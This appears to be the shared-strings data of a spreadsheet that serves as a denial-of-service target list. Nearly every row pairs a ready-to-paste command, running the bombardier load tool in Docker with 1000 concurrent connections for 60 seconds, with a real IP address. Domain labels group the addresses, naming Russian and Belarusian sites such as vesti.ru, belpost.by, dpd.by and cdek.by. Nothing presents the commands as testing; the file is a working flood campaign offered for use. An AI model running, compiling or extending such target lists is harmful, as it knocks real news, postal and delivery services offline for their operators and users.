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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="396">
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 162.255.119.192&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>162.255.119.192</t>
  </si>
  <si>
    <t>rtr-planeta.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.64.119.130&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.64.119.130</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.190.63.111&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>64.190.63.111</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 72.52.179.175&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>72.52.179.175</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.134&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.32.134</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.206&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.32.206</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.209&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.32.209</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.30&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.46.30</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.68&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.46.68</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.69&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.46.69</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 109.234.156.107&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>109.234.156.107</t>
  </si>
  <si>
    <t>vesti.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 151.248.120.203&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>151.248.120.203</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.31.179.191&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.31.179.191</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.99.12.170&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.99.12.170</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.208.83.45&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.208.83.45</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.222&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.248.232.222</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.10.45.39&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.10.45.39</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.22.235.94&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.22.235.94</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.113.234.215&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.113.234.215</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.209.148.130&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.209.148.130</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.42.165.36&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.42.165.36</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.196.234&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>217.69.196.234</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.205.163&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.31.205.163</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.21.252.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>46.21.252.14</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.188.28.172&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>5.188.28.172</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.188.30.5&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>5.188.30.5</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.50.65.32&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>52.50.65.32</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.122.170.171&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>62.122.170.171</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.39.162&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>78.46.39.162</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.208&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.32.208</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.247&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.247.32.247</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.13.58.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>81.13.58.18</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.176.77.99&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>81.176.77.99</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.90.180.107&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>81.90.180.107</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.146.36.160&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>82.146.36.160</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.206&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>87.236.16.206</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.211.250.222&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.211.250.222</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.236.136.178&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.236.136.178</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.241.170.215&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>92.241.170.215</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.31.224.95&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>95.31.224.95</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.106.250&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.106.250</t>
  </si>
  <si>
    <t>belpost.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.22.41&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.22.41</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.88&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.88</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.209.219.60&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>82.209.219.60</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.198&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.198</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 117.52.98.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>117.52.98.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 3.64.163.50&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>3.64.163.50</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.197&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.197</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.193&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.193</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.22.132&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.22.132</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 107.161.23.204&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>107.161.23.204</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 51.83.138.45&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>51.83.138.45</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.160.223&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.124.160.223</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.145.166&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>86.57.145.166</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.101.98&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>78.46.101.98</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.195&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.195</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.26.187&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.26.187</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.37.28&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.37.28</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.73.144&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.73.144</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.78&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.78</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.75&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.75</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.68&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.164.68</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 164.88.67.126&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>164.88.67.126</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.196&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.196</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.70&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.70</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.69&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.164.69</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.76&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.76</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.66&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.66</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.219.194.11&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.219.194.11</t>
  </si>
  <si>
    <t>autolight.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.173.136&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.173.136</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.247.76.71&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.247.76.71</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.32.28.254&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>64.32.28.254</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.92.90&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.40.92.90</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 35.186.238.101&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>35.186.238.101</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.31.217&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.31.217</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 66.81.199.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>66.81.199.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.30.201&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.30.201</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 18.116.152.12&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>18.116.152.12</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 3.130.204.160&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>3.130.204.160</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.29.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.29.14</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.249.83.165&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.249.83.165</t>
  </si>
  <si>
    <t>dpd.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.217.20.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.21.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.217.21.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.66.69.19&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.66.69.19</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.2.9&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.40.2.9</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.201.84&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.201.84</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.127&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.127</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.67&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.67</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.57&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.57</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.84&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.84</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.73&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.73</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.44&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.44</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.72&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.72</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.71&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.71</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.54.126.25&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>198.54.126.25</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.209.148.74&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.209.148.74</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.84.119.237&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.84.119.237</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 167.71.55.106&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>167.71.55.106</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.128.23.153&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>52.128.23.153</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.72&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.72</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.73&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.73</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.102.136.180&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>34.102.136.180</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.7&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.7</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 205.178.189.131&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>205.178.189.131</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.23.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.23.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.3&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>149.232.252.3</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.193.27&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.124.193.27</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.19&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>149.232.252.19</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.4&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>45.155.60.4</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.230&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.230</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.8&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>45.155.60.8</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.138.245.10&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>62.138.245.10</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.3.234&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.3.234</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.50.4.186&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.50.4.186</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.10.224.48&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.10.224.48</t>
  </si>
  <si>
    <t>mym.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.18.33&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.18.33</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.227.147&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.227.147</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.18.41&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.18.41</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.218.228.75&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.218.228.75</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.130.203.137&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.130.203.137</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.92.165.85&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>216.92.165.85</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.114.247.54&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.114.247.54</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.54&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.54</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.81&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.81</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.101.152.189&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>5.101.152.189</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.186.208.16&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.186.208.16</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.185.2&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>86.57.185.2</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.186.208.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.186.208.18</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.209.148.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.209.148.14</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.17.51.61&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>37.17.51.61</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.162.221.63&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.162.221.63</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.94.47.146&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>77.94.47.146</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.38.72.17&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.38.72.17</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.32.21&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>216.239.32.21</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 145.253.179.136&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>145.253.179.136</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 141.8.226.59&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>141.8.226.59</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.9.13&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.9.13</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.61.159&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.61.159</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.164.72&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.164.72</t>
  </si>
  <si>
    <t>glavdostavka.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.200.67.2&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>37.200.67.2</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.130.202.72&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.130.202.72</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.58.112.173&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.58.112.173</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.92.30&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.232.92.30</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.164.21&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.164.21</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.164.22&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.164.22</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.202&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>87.236.16.202</t>
  </si>
  <si>
    <t>cdek.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.160.223.124&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>217.160.223.124</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.58.112.174&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.58.112.174</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.255.194.134&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>173.255.194.134</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 1.13.6.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>1.13.6.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 27.124.125.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>27.124.125.18</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.146.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.232.146.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 99.83.154.118&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>99.83.154.118</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.55.109&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.20.55.109</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.50.2&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.20.50.2</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.16&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.215.4.16</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.40&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.165.123.40</t>
  </si>
